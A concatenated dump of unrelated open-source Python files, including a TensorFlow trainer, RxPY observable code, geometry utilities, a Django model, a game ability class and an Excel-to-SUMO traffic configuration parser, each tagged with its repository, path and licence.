kirmani/hlpr_cadence
|
third_party/hlpr_manipulation/hlpr_manipulation_utils/src/hlpr_manipulation_utils/manipulator.py
|
Python
|
mit
| 17,522
|
import tensorflow as tf
import numpy as np
class trainer(object):
def __init__(self, sess, model, Input, hps, path):
self.sess = sess
self.model = model
self.Input = Input
self.hps = hps
self.path = path
self.image = model.image
self.target = model.target
self.logits = model.logits
self.is_training = model.is_training
if 'keep_probs' in hps:
self.keep_probs = model.keep_probs
else:
self.keep_probs = None
self.global_step = tf.Variable(0, trainable=False, name='global_step')
self._train()
self._train_feed()
def _train_feed(self):
if self.keep_probs is None:
feed = lambda x, y, z: {self.image: x,
self.target: y,
self.is_training: z}
self.train_feed = lambda x, y: feed(x, y, True)
self.eval_feed = lambda x, y: feed(x, y, False)
else:
feed = lambda x, y, z, p: {self.image: x,
self.target: y,
self.is_training: z,
self.keep_probs: p}
self.train_feed = lambda x, y: feed(x, y, True, self.hps['keep_probs'])
self.eval_feed = lambda x, y: feed(x, y, False, 1.0)
def _train(self):
        cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
            labels=self.target, logits=self.logits)  # keyword args are required from TF 1.0 on
total_reg_loss = tf.add_n(tf.get_collection('reg_losses'), name='total_reg_loss')
self.loss = tf.reduce_mean(cross_entropy) + total_reg_loss
#self.lr = tf.train.piecewise_constant(self.global_step, [32000, 48000], [0.1, 0.01, 0.001])
self.lr = tf.train.piecewise_constant(self.global_step, [383*89, 383*133], [0.1, 0.01, 0.001])
#self.lr = tf.train.exponential_decay(0.1, self.global_step, 25*383, 0.5, staircase=True)
self.optimize = tf.train.MomentumOptimizer(learning_rate=self.lr, momentum=0.9)
self.train_op = self.optimize.minimize(self.loss, global_step=self.global_step)
self.correct_prediction = tf.equal(tf.argmax(self.logits, 1), self.target)
self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, "float"))
        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
        if update_ops:
            self.updates = tf.group(*update_ops)
        else:
            self.updates = tf.no_op()  # keeps the sess.run([...]) in train() valid when there are no update ops
def summary_setting(self):
self.summary_loss = tf.placeholder(dtype=tf.float32, shape=[])
self.summary_accuracy = tf.placeholder(dtype=tf.float32, shape=[])
tf.summary.scalar('loss', self.summary_loss)
tf.summary.scalar('accuracy', self.summary_accuracy)
        self.summary_op = tf.summary.merge_all()  # tf.merge_all_summaries() is the pre-1.0 name and does not exist alongside tf.summary.*
self.summary_writer = tf.summary.FileWriter(self.path, self.sess.graph)
def train(self):
self.summary_setting()
hps = self.hps
saver = tf.train.Saver()
step = -1
for epoch in range(hps['max_epoch']):
for i in range(self.Input.epoch_size):
                step += 1
x, y = self.Input.batch()
                # Note: tf.control_dependencies only affects graph construction,
                # so wrapping sess.run in it was a no-op; the call is made directly.
                self.sess.run([self.train_op, self.updates],
                              feed_dict=self.train_feed(x, y))
if step % 20 == 0:
self.validate(x, y)
saver.save(self.sess, self.path + '/model')
print "---Model have been saved---"
def validate(self, x, y):
loss = []
correct_prediction = []
for i in range(20):
loss_, correct_prediction_ = self.sess.run(
[self.loss, self.correct_prediction],
feed_dict=self.eval_feed(self.Input.val_data[i*50:i*50+50],
self.Input.val_labels[i*50:i*50+50]))
loss.append(loss_)
correct_prediction.append(correct_prediction_)
loss = np.mean(loss)
accuracy = np.mean(correct_prediction)
summary = self.sess.run(self.summary_op,
feed_dict={self.summary_loss: loss, self.summary_accuracy: accuracy})
t_loss, t_accuracy = self.sess.run([self.loss, self.accuracy],
feed_dict=self.eval_feed(x, y))
self.summary_writer.add_summary(summary, self.global_step.eval())
print "step:{0}, loss: {1}, accuracy: {2}".format(self.global_step.eval(), loss, accuracy)
print "train: loss: {0}, accuracy: {1}".format(t_loss, t_accuracy)
def eval(self):
correct_prediction = []
for i in range(10000/50):
correct_prediction_ = self.sess.run(
self.correct_prediction,
feed_dict=self.eval_feed(self.Input.eval_data[i*50:i*50+50],
self.Input.eval_labels[i*50:i*50+50]))
correct_prediction.append(correct_prediction_)
accuracy = np.mean(correct_prediction)
print "accuracy %f" % accuracy
|
pianomania/cifar10
|
trainer.py
|
Python
|
mit
| 4,648
|
from abc import abstractmethod
from typing import Any, Callable, Generic, Optional, TypeVar, Union
from reactivex import abc, typing
from reactivex.scheduler import ImmediateScheduler
from .observable import Observable
from .observer import Observer
_T = TypeVar("_T")
class Notification(Generic[_T]):
"""Represents a notification to an observer."""
def __init__(self) -> None:
"""Default constructor used by derived types."""
self.has_value = False
self.value: Optional[_T] = None
self.kind: str = ""
def accept(
self,
on_next: Union[typing.OnNext[_T], abc.ObserverBase[_T]],
on_error: Optional[typing.OnError] = None,
on_completed: Optional[typing.OnCompleted] = None,
) -> None:
"""Invokes the delegate corresponding to the notification or an
observer and returns the produced result.
Examples:
>>> notification.accept(observer)
>>> notification.accept(on_next, on_error, on_completed)
Args:
on_next: Delegate to invoke for an OnNext notification.
on_error: [Optional] Delegate to invoke for an OnError
notification.
on_completed: [Optional] Delegate to invoke for an
OnCompleted notification.
Returns:
Result produced by the observation."""
if isinstance(on_next, abc.ObserverBase):
return self._accept_observer(on_next)
return self._accept(on_next, on_error, on_completed)
@abstractmethod
def _accept(
self,
on_next: typing.OnNext[_T],
on_error: Optional[typing.OnError],
on_completed: Optional[typing.OnCompleted],
) -> None:
raise NotImplementedError
@abstractmethod
def _accept_observer(self, observer: abc.ObserverBase[_T]) -> None:
raise NotImplementedError
def to_observable(
self, scheduler: Optional[abc.SchedulerBase] = None
) -> abc.ObservableBase[_T]:
"""Returns an observable sequence with a single notification,
using the specified scheduler, else the immediate scheduler.
Args:
scheduler: [Optional] Scheduler to send out the
notification calls on.
Returns:
An observable sequence that surfaces the behavior of the
notification upon subscription.
"""
_scheduler = scheduler or ImmediateScheduler.singleton()
def subscribe(
observer: abc.ObserverBase[_T],
scheduler: Optional[abc.SchedulerBase] = None,
) -> abc.DisposableBase:
def action(scheduler: abc.SchedulerBase, state: Any):
self._accept_observer(observer)
if self.kind == "N":
observer.on_completed()
__scheduler = scheduler or _scheduler
return __scheduler.schedule(action)
return Observable(subscribe)
def equals(self, other: "Notification[_T]") -> bool:
"""Indicates whether this instance and a specified object are
equal."""
other_string = "" if not other else str(other)
return str(self) == other_string
def __eq__(self, other: Any) -> bool:
return self.equals(other)
class OnNext(Notification[_T]):
"""Represents an OnNext notification to an observer."""
def __init__(self, value: _T):
"""Constructs a notification of a new value."""
super(OnNext, self).__init__()
self.value: _T = value
self.has_value: bool = True
self.kind: str = "N"
def _accept(
self,
on_next: typing.OnNext[_T],
on_error: Optional[typing.OnError] = None,
on_completed: Optional[typing.OnCompleted] = None,
) -> None:
return on_next(self.value)
def _accept_observer(self, observer: abc.ObserverBase[_T]) -> None:
return observer.on_next(self.value)
def __str__(self) -> str:
val: Any = self.value
if isinstance(val, int):
val = float(val)
return "OnNext(%s)" % str(val)
class OnError(Notification[_T]):
"""Represents an OnError notification to an observer."""
def __init__(self, error: Union[Exception, str]):
"""Constructs a notification of an exception."""
super(OnError, self).__init__()
self.exception: Exception = (
error if isinstance(error, Exception) else Exception(error)
)
self.kind = "E"
def _accept(
self,
on_next: typing.OnNext[_T],
on_error: Optional[typing.OnError],
on_completed: Optional[typing.OnCompleted],
) -> None:
return on_error(self.exception) if on_error else None
def _accept_observer(self, observer: abc.ObserverBase[_T]):
return observer.on_error(self.exception)
def __str__(self) -> str:
return "OnError(%s)" % str(self.exception)
class OnCompleted(Notification[_T]):
"""Represents an OnCompleted notification to an observer."""
def __init__(self):
"""Constructs a notification of the end of a sequence."""
super(OnCompleted, self).__init__()
self.kind = "C"
def _accept(
self,
on_next: typing.OnNext[_T],
on_error: Optional[typing.OnError],
on_completed: Optional[typing.OnCompleted],
) -> None:
return on_completed() if on_completed else None
def _accept_observer(self, observer: abc.ObserverBase[_T]):
return observer.on_completed()
def __str__(self) -> str:
return "OnCompleted()"
def from_notifier(handler: Callable[[Notification[_T]], None]) -> Observer[_T]:
"""Creates an observer from a notification callback.
Args:
handler: Action that handles a notification.
Returns:
The observer object that invokes the specified handler using
a notification corresponding to each message it receives.
"""
def _on_next(value: _T) -> None:
return handler(OnNext(value))
def _on_error(error: Exception):
return handler(OnError(error))
def _on_completed():
return handler(OnCompleted())
return Observer(_on_next, _on_error, _on_completed)
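
# --- Illustrative usage sketch (added; not part of the original module) ---
# from_notifier funnels every observer event through a single Notification
# handler, which is handy for logging or recording sequences:
#
#     recorded = []
#     observer = from_notifier(recorded.append)
#     observer.on_next(42)      # recorded[0] is OnNext(42)
#     observer.on_completed()   # recorded[1] is OnCompleted()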
|
ReactiveX/RxPY
|
reactivex/notification.py
|
Python
|
mit
| 6,251
|
from typing import Any, Optional
from reactivex import Observable, abc
from reactivex.disposable import Disposable
def never_() -> Observable[Any]:
"""Returns a non-terminating observable sequence, which can be used
to denote an infinite duration (e.g. when using reactive joins).
Returns:
An observable sequence whose observers will never get called.
"""
def subscribe(
observer: abc.ObserverBase[Any], scheduler: Optional[abc.SchedulerBase] = None
) -> abc.DisposableBase:
return Disposable()
return Observable(subscribe)
__all__ = ["never_"]
|
ReactiveX/RxPY
|
reactivex/observable/never.py
|
Python
|
mit
| 605
|
from math import sin, cos, pi, degrees, radians, atan2
from point import Point
from line import Line
from arc import Arc
from circle import Circle
from polyline import Polyline
from block import Block
from vector import Vector
from affinematrix import AffineMatrix
def rotateAboutPoint(geom, p, radianAngle):
    '''
    rotates a geometric entity about a point
    '''
a1 = AffineMatrix().Z_rotation(radianAngle)
a2 = AffineMatrix().translation(Vector(p.x,p.y,p.z))
a3 = AffineMatrix().translation(Vector(-p.x,-p.y,-p.z))
geom2 = a2*a1*a3*geom # translate to origin, rotate, translate back (in new frame)
return geom2
def mirrorAboutLine(geom, l):
'''
mirror geometric entity about a line
'''
# this is the same as a 180 degree rotation about the line in 3D!
v_shift = Vector(l.startPoint.x,l.startPoint.y,l.startPoint.z)
#print "v_shift = %s" % str(v_shift)
#print "-1.0 * v_shift = %s" % str(-1.0 * v_shift)
v_axis = Vector(l.endPoint.x - l.startPoint.x,
l.endPoint.y - l.startPoint.y,
l.endPoint.z - l.startPoint.z)
#print "v_axis = %s" % str(v_axis)
tmshift = AffineMatrix().translation(-1.0 * v_shift)
tpshift = AffineMatrix().translation(v_shift)
y = l.endPoint.y - l.startPoint.y
x = l.endPoint.x - l.startPoint.x
theta = atan2(y,x)
trot1 = AffineMatrix().Z_rotation(-theta)
trot2 = AffineMatrix().Z_rotation(theta)
tflip = AffineMatrix([[1.0, 0.0, 0.0, 0.0], [0.0, -1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 0.0], [0.0, 0.0, 0.0, 1.0]])
#trot = AffineMatrix().rotationAboutVector(pi, v_axis)
#geom_out = tpshift * trot * tmshift * geom # translate to origin, perform rotation, and translate back
geom_out = tpshift * trot2 * tflip * trot1 * tmshift * geom
return geom_out
def polarArray(geom,numberOfCopies,totalAngle=2*pi,center=Point(0,0)):
'''
array geometric entity in a polar pattern
'''
b = Block()
theta_step = totalAngle / numberOfCopies
theta = 0.0
for i in range(numberOfCopies):
g = rotateAboutPoint(geom,center,theta)
b.append(g)
theta += theta_step
return b
def rectArray(geom, xNum, xStep, yNum=1, yStep=None):
    '''
    array geometric entity in a rectangular pattern
    '''
    if yStep is None:
        yStep = 0.0  # bug fix: the default None previously made 'y += yStep' raise a TypeError
    b = Block()
    y = 0.0
    for j in range(yNum):
        x = 0.0
        for i in range(xNum):
            t = AffineMatrix().translation(Vector(x, y, 0.0))
            b.append(t * geom)
            x += xStep
        y += yStep
    return b
if __name__=="__main__":
p0 = Point()
p1 = Point(1,1)
p2 = Point(2,1)
#print rotateAboutPoint(p1,p0,radians(45))
#print rotateAboutPoint(p1,p2,radians(180))
l1 = Line(p1,p2)
l2 = rotateAboutPoint(l1, p1, radians(30))
l3 = mirrorAboutLine(l2,l1)
l4 = mirrorAboutLine(l1,l2)
l5 = Line(Point(5,5),Point(6,5))
b = polarArray(l5,50,center = Point(5,5))
from fileformats.render2dxf import Render2DXF
r = Render2DXF()
q = [l1,l2,l3,l4]
q += b.seq
print q
#r.render2File(q,'testpattern.dxf')
r.render(q)
print r.d.entities
|
gfsmith/gears
|
gears/geometry/twod_operations.py
|
Python
|
mit
| 3,114
|
import OOMP
newPart = OOMP.oompItem(9579)
newPart.addTag("oompType", "VREG")
newPart.addTag("oompSize", "SO89")
newPart.addTag("oompColor", "X")
newPart.addTag("oompDesc", "V33D")
newPart.addTag("oompIndex", "A1")
OOMP.parts.append(newPart)
|
oomlout/oomlout-OOMP
|
old/OOMPpart_VREG_SO89_X_V33D_A1.py
|
Python
|
cc0-1.0
| 243
|
import OOMP
newPart = OOMP.oompItem(8804)
newPart.addTag("oompType", "CAPC")
newPart.addTag("oompSize", "0402")
newPart.addTag("oompColor", "X")
newPart.addTag("oompDesc", "PF18")
newPart.addTag("oompIndex", "V50")
OOMP.parts.append(newPart)
|
oomlout/oomlout-OOMP
|
old/OOMPpart_CAPC_0402_X_PF18_V50.py
|
Python
|
cc0-1.0
| 244
|
# coding=utf-8
from descriptor_tools import get_descriptor
__author__ = 'Jake'
__all__ = ['name_of', 'id_name_of']
def name_of(descriptor, owner):
"""
Given a descriptor and a class that the descriptor is stored on, returns
the name of the attribute the descriptor is stored under.
Also works if the given class is a subclass of the class that *actually*
has the descriptor attribute
:param descriptor: descriptor the name is being looked up for
:param owner: class that "owns" the descriptor
:return: the name the descriptor is stored under on *owner*
"""
name = _first(attr for attr in dir(owner)
if (get_descriptor(owner, attr) is descriptor))
if name is None:
raise RuntimeError(
str.format(
"The descriptor, '{}', does not exist on type, '{}'",
descriptor,
owner.__qualname__))
return name
def _first(iterable):
    return next(iterable, None)
def id_name_of(descriptor):
"""
    Returns a string of the hexadecimal version of *descriptor*'s id,
sans the leading '0'. So, it'll be something like 'xf8e8aa97'. It
removes the 0 so that it will start with an alpha character,
allowing it to still be a proper Python identifier, which keeps it
from breaking `dir()`
:param descriptor: descriptor to generate the name for/from
:return: a generated name for the given descriptor
"""
return hex(id(descriptor))[1:]
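
# --- Illustrative usage sketch (added; 'Descriptor' and 'Example' are
# hypothetical classes, assuming get_descriptor returns the raw instance) ---
#
#     class Descriptor(object):
#         def __get__(self, instance, owner):
#             return 42
#
#     class Example(object):
#         answer = Descriptor()
#
#     name_of(Example.__dict__['answer'], Example)  # -> 'answer'
#     id_name_of(Example.__dict__['answer'])        # -> e.g. 'x7f2c9a3b10'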
|
sad2project/descriptor-tools
|
src/descriptor_tools/names.py
|
Python
|
cc0-1.0
| 1,493
|
# -*- coding: utf-8 -*-
from django.db import models
from gestao.financeiro.models.basico.Banco import Banco
class ContaDeBanco(models.Model):
agencia = models.CharField(verbose_name="Agência", max_length=10)
conta_corrente = models.CharField(verbose_name="Conta Corrente", max_length=15)
operacao = models.CharField(verbose_name="Operação", max_length=5, null=True, blank=True)
banco = models.ForeignKey(Banco, verbose_name="Banco")
def __unicode__(self):
return u'BANCO: %s, AG: %s, CC: %s' % (self.banco, self.agencia, self.conta_corrente)
class Meta:
app_label = 'financeiro'
verbose_name = 'Conta do Banco'
verbose_name_plural = 'Contas de Banco'
unique_together = ("agencia", "conta_corrente", "banco")
|
marcospereirampj/gestao_empresarial
|
gestao/financeiro/models/basico/ContaDeBanco.py
|
Python
|
cc0-1.0
| 822
|
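# Note (added): this file relies on UsableAbility and get_dist being importable
# from the surrounding project; the original source omits those import lines.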
class Spark(UsableAbility):
def __init__(self, owner):
super().__init__()
self.owner = owner
self.ability_attr["name"] = "Spark"
self.ability_attr["magic_type"] = "electric"
self.ability_attr["lvl"] = 1
self.ability_attr["cost"] = 20
self.ability_attr["cost_type"] = "mp"
self.ability_attr["cast_time"] = 0.5
self.ability_attr["range"] = 500
self.ability_attr["hit_range"] = 50
self.use_effect = "Electric 9"
self.use_effect_scale = 1.0
self.target_effects_base["dmg"] = 150
self.target_effects_base["dmg_type"] = self.ability_attr["magic_type"]
self.target_effects = dict()
self.apply_modifiers()
def custom_action(self, target):
dist = get_dist(self.owner.x, self.owner.y, *target)
if dist <= self.ability_attr["range"]:
if self.do_cost():
animpos = self.owner.window.get_windowpos(
*target, precise=True
)
self.owner.window.animator.spawn_anim(
self.use_effect, animpos, scale=self.use_effect_scale
)
for e in self.owner.game.enemies:
dist = get_dist(*target, e.x, e.y)
if dist <= self.ability_attr["hit_range"]:
dmgscale = 1.0 - dist / self.ability_attr["hit_range"] * 0.75
eff = self.target_effects.copy()
eff["dmg"] = self.target_effects["dmg"] * dmgscale
e.do_effect(eff)
|
NiclasEriksen/rpg_procgen
|
ability_files/spark.py
|
Python
|
cc0-1.0
| 1,604
|
from setuptools import setup, find_packages
setup(name='BIOMD0000000388',
version=20140916,
description='BIOMD0000000388 from BioModels',
url='http://www.ebi.ac.uk/biomodels-main/BIOMD0000000388',
maintainer='Stanley Gu',
maintainer_url='stanleygu@gmail.com',
packages=find_packages(),
package_data={'': ['*.xml', 'README.md']},
)
|
biomodels/BIOMD0000000388
|
setup.py
|
Python
|
cc0-1.0
| 377
|
"""
.. _ts_config_parser:
Excel Configuration Parser Internals
------------------------------------
This module handles all of the excel configuration parsing.
Guidelines on excel sheet formatting is as follows:
+------------------+--------------------+------------------+--------------------+--------------------+
|Column A | Column B |Column C | Column E | Column F |
+==================+====================+==================+====================+====================+
|SUMO Attribute |SUMO File where this|Category name |Units column |Value for this attr |
| |attribute resides | | | |
+------------------+--------------------+------------------+--------------------+--------------------+
Attributes can only be read from Row 3 and below (MIN_ROW)
Only the first 1000 rows can have any attributes (MAX_ROW)
Current supported tabs:
* Vehicle Type Customization
* General Settings
* Intersection Definition
* Branch Settings
Current supported Intersection Types:
* Cross
* T
* Y
Cross intersection has been tested.
"""
from openpyxl import *
import json
import xml.etree.ElementTree as ET
import xml.dom.minidom
SUMO_ATTR_COLUMN = 0 # Column A
SUMO_FILE_COLUMN = 1 # Column B
CATEGORY_COLUMN = 2
UNITS_COLUMN = 4 # Column E
VALUE_COLUMN = 5 # Column F for single entry data
MIN_ROW = 3 # Minimum row number where config information CAN be stored
MAX_ROW = 1000 # Max row where data is stored TODO update?
UNIT_CONVERT = {
"time": {"Hours": 60 * 60, "Days": 60 * 60 * 24,
"Months": 60 * 60 * 24 * 30.41,
"Years": 60 * 60 * 24 * 30.41 * 12}, # How many seconds per time unit
"angle": {"N": 90, "NE": 45, "E": 0, "SE": 315,
"S": 270, "SW": 225, "W": 180, "NW": 135, },
}
# List of file extensions
ROUTE = "rou"
NET = "net"
SUMOFILE = 0
SUMOATTR = 1
USERVAL = 3 # First user_val
VALUNITS = 2
TAB_NAMES = ["Vehicle Type Customization", "General Settings", "Intersection Definition", "Branch Settings"]
ITYPE_BRANCHES = {
"Cross": 4,
"T": 3,
"Y": 3,
}
OUTPUT_DICT = {
"SUMOCFG": {},
"Branches": {},
"Intersections": {},
}
def parse_general(sheet):
"""
Parses the given sheet assuming it is the General Settings sheet
Adds parsed data to OUTPUT_DICT global variable
Parameters
----------
sheet: openpyxl sheet - The General Settings tab
Returns
-------
String - The name of the current configuration
"""
# Get the Configuration name.
input_config_name = get_input_from_row(sheet, MIN_ROW) # Configuration Name
# Write Config names to the output dict
if input_config_name[SUMOFILE] == "SUMOCFG" and input_config_name[SUMOATTR] == "input":
config_name = input_config_name[USERVAL]
OUTPUT_DICT["SUMOCFG"]["input"] = {"net_file": "%s.net.xml" % config_name,
"route_files": "%s.rou.xml" % config_name,
"additional_files": "%s.add.xml" % config_name}
    else:
        print("Config name Error")  # TODO fill out
        config_name = None  # guard added: config_name would otherwise be unbound at the return below
# Simulation length
input_runtime_length = get_input_from_row(sheet, MIN_ROW + 1)
if input_runtime_length[SUMOFILE] == "SUMOCFG" and input_runtime_length[SUMOATTR] == "time.end":
sim_seconds = input_runtime_length[USERVAL] * UNIT_CONVERT["time"][
input_runtime_length[VALUNITS]] # TODO check if units is in time_convert?
OUTPUT_DICT["SUMOCFG"]["time"] = {"begin": "0", "end": "%d" % sim_seconds}
else:
print("TIME ERROR", input_runtime_length) # TODO fill out
OUTPUT_DICT["SUMOCFG"]["gui_only"] = {"gui_settings_file": "gui-settings.cfg"}
# Overall Traffic Demand
# TODO Where does this go in the xmls if anywhere?
# input_traffic_demand = get_input_from_row(sheet, MIN_ROW+2)
return config_name
def parse_intersection(sheet):
"""
Parses the given sheet assuming it is the Intersections sheet
Adds parsed data to OUTPUT_DICT global variable
Parameters
----------
sheet: openpyxl sheet - The General Intersection Settings tab
Returns
-------
String - The selected intersection type. Key in ITYPE_BRANCHES
"""
# Intersection type (Cross, T, Y, etc)
input_intersection_type = get_input_from_row(sheet, MIN_ROW)
intersection_type = input_intersection_type[USERVAL]
if intersection_type not in ITYPE_BRANCHES.keys():
print("Unrecognized Intersection type: %s" % intersection_type)
return None
OUTPUT_DICT["Intersections"]["I0"] = {}
# TODO Add in support for multiple intersections.
# Initialize the intersection in The output Dict
intersection_name = "I%d" % 0
OUTPUT_DICT["Intersections"][intersection_name]["id"] = 0
OUTPUT_DICT["Intersections"][intersection_name]["type"] = "traffic_light"
return intersection_type
def parse_branches(sheet, intersection_type):
"""
Parses the given sheet assuming it is the branches sheet
Fills out OUTPUT_DICT with all information needed to parse the branches of the intersection.
Parameters
----------
sheet: openpyxl sheet - The General Branches Settings tab
intersection_type: - enum specified in ITYPE_BRANCHES specifying the current intersection type (i.e cross, T, Y)
Returns
-------
None
"""
# Get the number of branches
num_branches = ITYPE_BRANCHES[intersection_type]
# Initialize the output dictionary with the branches
for branch_num in range(1, num_branches + 1):
b_name = "B%d" % branch_num # Branch name is Bn where n is the branches ID
OUTPUT_DICT["Branches"][b_name] = {}
for row in range(MIN_ROW, MAX_ROW): # For each row that may contain data
if row_has_data(sheet, row): # Check if this row has data
input_data = get_input_from_row(sheet, row, num_branches) # Get the data
units = input_data[VALUNITS].lower()
# Fill out OUTPUT_DICT with data from each branch for this attribute
for branch_num in range(0, num_branches):
b_name = "B%d" % (branch_num + 1)
user_value = input_data[USERVAL + branch_num]
if units in UNIT_CONVERT.keys():
user_value = UNIT_CONVERT[units][user_value]
# TODO normalize the data using the units
# TODO verify inbound lanes sum up to numLanes
# write to output
OUTPUT_DICT["Branches"][b_name][input_data[SUMOATTR]] = user_value
def parse_stats(sheet):
"""
Parses the given sheet assuming it is the advanced customization sheet
The parsed data is stored as a xml.etree.ElementTree element.
This becomes the stats file for SUMO
Parameters
----------
sheet: The advanced customization sheet
Returns
-------
"xml.etree.ElementTree" node containing the full statistics file information
"""
# TODO Bus Stops is not currently supported.
category_translate = {"Work Hours": "workHours", "City Gates": "cityGates",
"Bus Stations": "busStations", "Bus Lines": "busLines"}
expected_entries = {"bracket": 3, "opening": 2, "closing": 2, "street": 3, "entrance": 4,
"school": 7, "busStation": 3}
sub_tags = {"population": "bracket", "workHours": "opening", "streets": "street", "cityGates": "entrance",
"schools": "school",
"busStations": "busStation"}
root = ET.Element("city")
current_category = None
category_root = None
data = None
num_entries = 15 # Maximum number of entries for any category TODO global
for row in range(MIN_ROW, 100):
# prettyprint(root)
if row_has_category(sheet, row) is not None:
# If a category has been parsed, put it in the xml
if data is not None:
for tag in data.keys():
attributes = data[tag]
if "TAG" in attributes.keys():
sub_tag = attributes["TAG"].lower()
del attributes["TAG"]
else:
sub_tag = tag.split("_")[0]
if sub_tag in expected_entries.keys() and len(attributes) < expected_entries[sub_tag]:
continue
ET.SubElement(category_root, sub_tag, attrib={attr: str(attributes[attr]) for attr in attributes})
# prettyprint(root)
current_category = row_has_category(sheet, row)
if current_category in category_translate.keys():
current_category = category_translate[current_category]
else:
current_category = current_category.lower().strip(" ")
category_root = ET.SubElement(root, current_category)
data = None
continue
elif category_root is None:
continue
if current_category in ["general", "parameters"]:
if row_has_data(sheet, row):
input_data = get_input_from_row(sheet, row, cols=1)
category_root.attrib[input_data[SUMOATTR]] = str(input_data[USERVAL])
elif current_category in ["population", "workHours", "streets", "cityGates", "schools", "busStations"]:
sub_tag = sub_tags[current_category]
if row_has_data(sheet, row):
input_data = get_input_from_row(sheet, row, cols=100)
if data is None:
data = {"%s_%d" % (sub_tag, i): {} for i in range(0, num_entries)}
for i in range(0, len(input_data) - 3):
attribute = input_data[SUMOATTR]
if attribute == "edge2": # Deal with inbound/outbound attributes since sumo uses i and o notation
data["%s_%d" % (sub_tag, i)]["edge"] += {"Inbound": "i", "Outbound": "o"}[
input_data[USERVAL + i]]
else:
data["%s_%d" % (sub_tag, i)][attribute] = str(input_data[USERVAL + i])
# Workhours is implicitly supported
# elif current_category == "workHours":
# pass
return root
def prettyprint(root, print_it=False, suppress_errors=True):
    """
    Attempts to create a human readable string out of a given xml Element
    Parameters
    ----------
    root: "xml.etree.ElementTree" Element containing valid xml data
    print_it: Tells the function whether or not it should also print out the xml
    suppress_errors: Tells the function to NOT print out errors if given data was invalid
    Returns
    -------
    String containing the formatted xml data if possible
    """
    try:
        xml1 = xml.dom.minidom.parseString(ET.tostring(root, encoding='utf8', method='xml').decode())
        formatted_xml = xml1.toprettyxml()
        if print_it:
            print(formatted_xml)
        return formatted_xml  # bug fix: the original re-encoded this string via ET.tostring, which expects an Element
    except Exception as e:
        if suppress_errors is False:
            print(e)
            print('Function "prettyprint()" received invalid xml data')
            # print(root)
def row_has_data(sheet, row_num):
"""
Checks whether or not this row contains a user-entered value.
Parameters
----------
sheet: openpyxl sheet - The sheet to use
row_num: The row to analyze
Returns
-------
True if there is data to be analyzed
False otherwise
"""
# Get the data from the row
rows = sheet.iter_rows(min_col=1, min_row=row_num, max_col=15, max_row=row_num)
for row in rows: # FIXME Is there a better way to look at just 1 row
# if there is no SUMO Attribute specified, then there is no user entered data available
sumo_attr = row[SUMO_ATTR_COLUMN].value
if sumo_attr is None:
return False
else:
return True
# should not be executed
print("ERROR - row_has_data() did not find row")
return False
def row_has_category(sheet, row_num):
"""
Checks to see if this row starts a new category
Parameters
----------
sheet: openpyxl sheet - The sheet to use
row_num: The row to analyze
Returns
-------
True if there is a new category
False otherwise
"""
# Get the data from the row
rows = sheet.iter_rows(min_col=1, min_row=row_num, max_col=15, max_row=row_num)
for row in rows: # FIXME Is there a better way to look at just 1 row
# If there is text in the Category Column then it is a new category
class_name = row[CATEGORY_COLUMN].value
if class_name is None:
return None
else:
return class_name
# should not be executed
print("ERROR - row_has_category() did not find any rows")
return None
def get_input_from_row(sheet, row_num, cols=1):
"""
Retrieves the input from the row and returns a tuple of all the relevant data
Parameters
----------
sheet: The sheet to read
row_num: The row number to use
cols: The number of columns to the RIGHT of row_num to return
Returns
-------
    Tuple containing the data -
formatted as (sumo_file, sumo_attribute, units, user_val1, user_val2...)
"""
output = []
rows = sheet.iter_rows(min_col=1, min_row=row_num, max_col=VALUE_COLUMN + cols, max_row=row_num)
for row in rows:
# Determine the SUMO_FILE attribute
sumo_file = row[SUMO_FILE_COLUMN].value
if sumo_file is None: sumo_file = "N/A"
output.append(sumo_file)
# Determine the SUMO_ATTR attribute
sumo_attr = row[SUMO_ATTR_COLUMN].value
if sumo_attr is None: sumo_attr = "N/A"
output.append(sumo_attr)
# Determine the units
units = row[UNITS_COLUMN].value # TODO check if user entered units
if units is None: units = "N/A"
output.append(units)
# Determine all user entered values
for col in range(VALUE_COLUMN, VALUE_COLUMN + cols):
user_value = row[col].value
if user_value is None: break
output.append(user_value)
return tuple(output)
def run_parser(excel_file_path, outpath):
"""
Main function to actually run the whole parser
Parameters
----------
excel_file_path: FULL file path to the excel sheet
outpath: File to output the temporary json file
Returns
-------
In order:
1) config_name: The name for the current configuation
2) OUTPUT_DICT: python dictionary containing all relevant information
3) Stats file xml
"""
wb = load_workbook(filename=excel_file_path, data_only=True)
config_name = parse_general(wb["General Settings"])
    itype = parse_intersection(wb["Intersection Settings"])
    if itype is None:  # bug fix: the original tested the function object 'parse_intersection' instead of its result
        print("ERROR")
        return -1
    parse_branches(wb["Branch Settings"], itype)
# Context manager to dump parsed config to json
with open(outpath + "/" + config_name + "_parsed.json", 'w') as outfile:
json.dump(OUTPUT_DICT, outfile, indent=4, )
stats_root_node = parse_stats(wb["Advanced Customization"])
stats_xml = xml.dom.minidom.parseString(ET.tostring(stats_root_node, encoding='utf8', method='xml').decode())
return config_name, OUTPUT_DICT, stats_xml.toprettyxml()
if __name__ == "__main__":
run_parser('Configuration_template.xlsx', './test_dir')
|
TrafficSenseMSD/core
|
ts_core/config/parser.py
|
Python
|
epl-1.0
| 15,629
|
###
# Copyright 2011 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
class typednone(object):
'''
A wrapper class for use when calling java overloaded methods and you
need to distinguish which one of the methods to call when the argument
is None. Has the effect of in Java source of (Type)null.
'''
def __init__(self, typedNoneType="java.lang.Object"):
'''Create an instance of a typed none. The argument should be
the name of a Java type suitable to pass to Class.forName()'''
self.typedNoneType = typedNoneType
__hash__ = None
def __eq__(self, other):
return (isinstance(other, self.__class__)
and self.typedNoneType == other.typedNoneType)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(%s)' % (self.__class__.__name__, self.__dict__.__repr__())
class abstractdatasetdescriptor(object):
'''
    Use this class to describe an AbstractDataset or ndarray that already resides on disk and can be loaded
    using the file loaders. This object is flattened to a serialisable representation that is unflattened
by AbstractDatasetHelper.
The unflattened form of this type is an AbstractDataset
'''
